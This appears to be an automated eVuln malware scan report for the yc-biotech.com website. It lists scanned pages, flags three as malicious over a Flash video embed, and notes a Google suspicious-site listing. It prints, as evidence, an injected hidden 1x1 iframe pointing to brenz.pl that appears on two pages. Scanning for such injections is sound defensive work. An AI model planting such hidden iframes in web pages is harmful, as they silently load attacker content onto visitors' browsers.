New scan:

Malware Scanner report for yc-biotech.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "yc-biotech.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/2
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=yc-biotech.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.yc-biotech.com/
200 OK
Content-Length: 18940
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var swf_width=208
var swf_height=158
var texts='ÊÓƵ²¥·Å'
var files='http://www.sodedao.com/shipin/jinzhao.flv'
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="'+ swf_width +'" height="'+ swf_height +'">');
document.write('<param name="movie" value="vcastr.swf"><param name="quality" value="high">');
document.wri
... 151 bytes are skipped ...
true" />');
document.write('<param name="FlashVars" value="vcastr_file='+files+'&vcastr_title='+texts+'&IsAutoPlay=1">');
document.write('<embed src="vcastr.swf" allowFullScreen="true" FlashVars="vcastr_file='+files+'&vcastr_title='+texts+'" menu="false" quality="high" width="'+ swf_width +'" height="'+ swf_height +'" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>');

Antivirus reports:

Zoner
" type=

http://www.yc-biotech.com/mm_menu.js
200 OK
Content-Length: 30741
Content-Type: application/x-javascript
clean
http://www.yc-biotech.com/index.asp
200 OK
Content-Length: 18940
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var swf_width=208
var swf_height=158
var texts='ÊÓƵ²¥·Å'
var files='http://www.sodedao.com/shipin/jinzhao.flv'
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="'+ swf_width +'" height="'+ swf_height +'">');
document.write('<param name="movie" value="vcastr.swf"><param name="quality" value="high">');
document.wri
... 151 bytes are skipped ...
true" />');
document.write('<param name="FlashVars" value="vcastr_file='+files+'&vcastr_title='+texts+'&IsAutoPlay=1">');
document.write('<embed src="vcastr.swf" allowFullScreen="true" FlashVars="vcastr_file='+files+'&vcastr_title='+texts+'" menu="false" quality="high" width="'+ swf_width +'" height="'+ swf_height +'" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>');

Antivirus reports:

Zoner
" type=

http://www.yc-biotech.com/about.asp
200 OK
Content-Length: 16270
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var swf_width=430
var swf_height=300
var texts='ÊÓƵ²¥·Å'
var files='http://www.sodedao.com/shipin/bofeng.flv'
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="'+ swf_width +'" height="'+ swf_height +'">');
document.write('<param name="movie" value="vcastr.swf"><param name="quality" value="high">');
document.writ
... 150 bytes are skipped ...
true" />');
document.write('<param name="FlashVars" value="vcastr_file='+files+'&vcastr_title='+texts+'&IsAutoPlay=1">');
document.write('<embed src="vcastr.swf" allowFullScreen="true" FlashVars="vcastr_file='+files+'&vcastr_title='+texts+'" menu="false" quality="high" width="'+ swf_width +'" height="'+ swf_height +'" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>');

Antivirus reports:

Zoner
" type=

Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>

http://www.yc-biotech.com/news.asp?cid=1
200 OK
Content-Length: 16347
Content-Type: text/html
clean
http://www.yc-biotech.com/product/pro.asp
200 OK
Content-Length: 27305
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.brenz.pl/rc/

<iframe style="height:1px" src="http://www&#46;brenz.pl/rc/" frameborder=0 width=1>

http://www.yc-biotech.com/product/js/qqz.js
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean
http://www.yc-biotech.com/test404page.js
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean
http://www.yc-biotech.com/product/mm_menu.js
200 OK
Content-Length: 30741
Content-Type: application/x-javascript
clean
http://www.yc-biotech.com/tec.asp
200 OK
Content-Length: 14258
Content-Type: text/html
clean
http://www.yc-biotech.com/service.asp
200 OK
Content-Length: 16894
Content-Type: text/html
clean
http://www.yc-biotech.com/hr.asp
200 OK
Content-Length: 13453
Content-Type: text/html
clean
http://www.yc-biotech.com/video.asp
200 OK
Content-Length: 12945
Content-Type: text/html
clean
http://www.yc-biotech.com/contact.asp
200 OK
Content-Length: 17024
Content-Type: text/html
clean
http://api.map.baidu.com/api?key=&v=1.1&services=true
200 OK
Content-Length: 317
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: yc-biotech.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: yc-biotech.com
Referer: http://www.google.com/search?q=yc-biotech.com

Result:
The result is similar to the first query. There are no suspicious redirects found.